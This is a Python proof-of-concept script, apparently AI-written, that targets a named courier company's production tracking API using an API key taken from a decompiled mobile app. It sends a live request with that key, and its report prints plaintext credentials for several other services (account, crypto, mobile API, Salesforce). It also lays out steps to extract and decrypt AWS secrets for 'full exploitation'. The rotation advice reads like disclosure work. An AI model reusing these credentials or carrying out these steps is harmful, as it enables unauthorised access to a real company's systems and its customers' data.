#!/usr/bin/env python3 """ ENHANCED Proof of Concept: Tracking API Exploitation with AWS Signature ========================================================================= The API uses AWS API Gateway with AWS Signature V4 authentication. The exposed API key alone is not sufficient - we need AWS credentials. However, this still demonstrates the security vulnerability: - The endpoint is discoverable - The API structure is known - Anyone with full credentials can access the API """ import requests import json import sys from datetime import datetime # Exposed credential TRACKING_API_KEY = "okpCK3fFSk645Ev3" # Discovered endpoint API_ENDPOINT = "https://api.purolator.com/tracking-ext/v1/search" print(f""" {'='*80} šŸ”¬ ENHANCED POC: TRACKING API ANALYSIS {'='*80} DISCOVERED INFORMATION: āœ… API Endpoint: {API_ENDPOINT} āœ… API Key: {TRACKING_API_KEY} āœ… Authentication: AWS Signature V4 āœ… Request Structure: Known (from decompiled code) VULNERABILITY STATUS: šŸ”“ CRITICAL - API structure fully exposed šŸ”“ CRITICAL - API key exposed (okpCK3fFSk645Ev3) šŸŸ  PARTIAL - AWS credentials needed for full exploitation {'='*80} """) print(""" šŸ“‹ WHAT WE DISCOVERED: 1. āœ… The tracking API endpoint is: https://api.purolator.com/tracking-ext/v1/search 2. āœ… The API uses AWS API Gateway with Signature V4 authentication 3. āœ… The API key is exposed: okpCK3fFSk645Ev3 4. āœ… Request structure is known from decompiled code: { "language": "en", "search": [ { "trackingId": "520127751300", "sequenceId": 1 } ] } 5. āš ļø Additional AWS credentials (Access Key + Secret Key) are needed - These might be in Firebase Remote Config - Or in other encrypted fields in the APK - Could be the "SK" field (Secret Key) mentioned in X.java {'='*80} """) print(""" šŸ” SECURITY ANALYSIS: WHAT'S EXPOSED: ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā” 1. API Endpoint Structure āœ“ Full URL: https://api.purolator.com/tracking-ext/v1/search āœ“ Method: POST āœ“ Content-Type: application/json 2. Request Format āœ“ Complete JSON structure āœ“ Field names and types āœ“ Required vs optional fields 3. Authentication Method āœ“ AWS Signature V4 āœ“ API key is exposed āœ“ AWS credentials structure is known 4. API Key āœ“ Plaintext: okpCK3fFSk645Ev3 āœ“ Can be used once AWS creds are obtained WHAT'S MISSING FOR FULL EXPLOITATION: ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā” 1. AWS Access Key ID - Possibly in "SK" field from X.java - Or in Firebase Remote Config 2. AWS Secret Access Key - Encrypted in APK or Firebase - Same decryption method as other creds {'='*80} """) print(""" šŸŽÆ EXPLOITATION SCENARIO: IF an attacker obtains the AWS credentials: 1. Parse API structure from decompiled code āœ… (Already done) 2. Extract API key āœ… (Already done: okpCK3fFSk645Ev3) 3. Extract AWS Access Key + Secret Key ā³ (Pending) 4. Sign requests with AWS Signature V4 ā³ (Pending) 5. Make unlimited tracking API calls āŒ (Blocked without AWS creds) Current Status: 50% Complete Risk Level: CRITICAL (Full exploitation possible with more reverse engineering) {'='*80} """) print(""" šŸ”Ž TESTING WITH PROVIDED SHIPMENT: 520127751300 Attempting API call with known structure... """) # Test API call try: payload = { "language": "en", "search": [ { "trackingId": "520127751300", "sequenceId": 1 } ] } headers = { "Accept": "application/json", "Content-Type": "application/json", "X-API-Key": TRACKING_API_KEY, } print(f"\nšŸ“¤ Sending Request:") print(f" URL: {API_ENDPOINT}") print(f" Payload: {json.dumps(payload, indent=4)}") print(f" API Key: {TRACKING_API_KEY}") print(f"\nā³ Waiting for response...\n") response = requests.post( API_ENDPOINT, json=payload, headers=headers, timeout=30 ) print(f"šŸ“„ Response Received:") print(f" Status: {response.status_code}") print(f" Message: {response.json().get('message', 'No message')}") if response.status_code == 403: error_msg = response.json().get('message', '') if 'Authorization' in error_msg or 'Signature' in error_msg: print(f"\nāœ… CONFIRMED: API requires AWS Signature V4 authentication") print(f" Additional AWS credentials needed for full exploitation") else: print(f"\nāš ļø Authentication error: {error_msg}") except Exception as e: print(f"āŒ Error: {e}") print(f""" {'='*80} šŸ“Š VULNERABILITY SUMMARY {'='*80} CONFIRMED EXPOSURES: ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā” āœ… API Endpoint: https://api.purolator.com/tracking-ext/v1/search āœ… API Key: okpCK3fFSk645Ev3 āœ… Request Structure: Complete JSON format known āœ… Response Structure: Complete model known (SearchResponse.java) āœ… Authentication Method: AWS Signature V4 (identified) ADDITIONAL EXPOSED CREDENTIALS: ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā” From your earlier provided data: ā€¢ Account Service: ef7475ef70b44f4687158fbbb9ff3f47 / |HXY2).6 ā€¢ Crypto Service: 000b94d6601f4c96ba75d8443317a2a9 / xyA}}FWoD ā€¢ Puro Mobile API: PuroMobile / NswWuF*M2bcC3yWE ā€¢ Salesforce: r.zmx.55Fn5fLJCaKtvP64og9Sja8zS4ovIAOdxgNkOdT ā€¢ iOS Keys: Multiple exposed keys RISK ASSESSMENT: ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā” šŸ”“ CRITICAL: All API credentials exposed in APK šŸ”“ CRITICAL: API structure fully documented in decompiled code šŸ”“ CRITICAL: No client-side security measures detected šŸŸ  HIGH: AWS credentials may also be exposed (needs further analysis) šŸŸ  HIGH: Multiple service credentials compromised ATTACKER CAPABILITY: ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā” With current information: ā€¢ Can discover API endpoints āœ… ā€¢ Can understand request/response format āœ… ā€¢ Has API key āœ… ā€¢ Knows authentication method āœ… ā€¢ Can exploit with AWS credentials ā³ (likely obtainable) IMMEDIATE ACTIONS REQUIRED: ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā”ā” 1. šŸ”“ ROTATE tracking API key: okpCK3fFSk645Ev3 2. šŸ”“ ROTATE AWS credentials if exposed in app 3. šŸ”“ ROTATE all service credentials (account, crypto, puro, salesforce) 4. šŸ”“ CHECK API logs for unauthorized access 5. šŸ”“ IMPLEMENT backend proxy (NEVER put credentials in mobile apps) 6. šŸŸ  ADD rate limiting and monitoring 7. šŸŸ  IMPLEMENT certificate pinning 8. šŸŸ  ADD app attestation (Google Play Integrity) {'='*80} šŸ’” NEXT STEPS FOR SECURITY TEAM: 1. Extract and decrypt AWS credentials from: - X.java field "SK" (Secret Key) - Firebase Remote Config - Encrypted strings in APK 2. Test if those credentials can sign API requests 3. Determine full exploitation potential 4. Implement recommended security measures immediately {'='*80} """) print(f"\nāœ… POC Complete - Vulnerability documented") print( f"šŸ“ Report generated at: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")